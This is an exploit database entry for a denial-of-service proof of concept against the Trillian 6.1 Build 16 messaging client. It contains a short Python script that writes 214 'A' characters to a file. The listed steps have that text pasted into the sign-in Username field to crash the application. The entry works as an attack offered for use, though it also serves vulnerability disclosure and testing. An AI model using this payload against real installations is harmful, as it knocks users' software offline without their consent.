Trillian 6.1 Build 16 - 'Sign In' Denial of service (PoC)
Author: Jose Miguel Gonzalez
type: dos
platform: windows_x86-64
port:
date_added: 2018-08-29
date_updated: 2018-09-08
verified: 1
codes:
tags: Denial of Service (DoS)
aliases:
screenshot_url:
application_url: http://www.exploit-db.comtrillian-v6.1.0.16.exe
#Exploit Title: Trillian 6.1 Build 16 - "Sign In" Denial of service (PoC)
#Discovery by: Jose Miguel Gonzalez
#Discovery Date; 2018-08-29
#Vendor Homepage: https://www.trillian.im/
#Software Link: https://www.trillian.im/download/
#Tested Version: 6.1 Build 16
#Tested on OS: Windows 10 Single Language x64
#Steps to produce the crash
#1.- Run the python code: trillian.py
#2.- Open trillian.txt and copy context to clipboard
#3.- Open Trillian application
#4.- Paste clipboard on "Username"
#5.- Put "1234" on "Password"
#5.- Sign In
#6.- Crashed
mem = "\x41" * 214
f = open ("trillian.txt", "w")
f.write(mem)
f.close()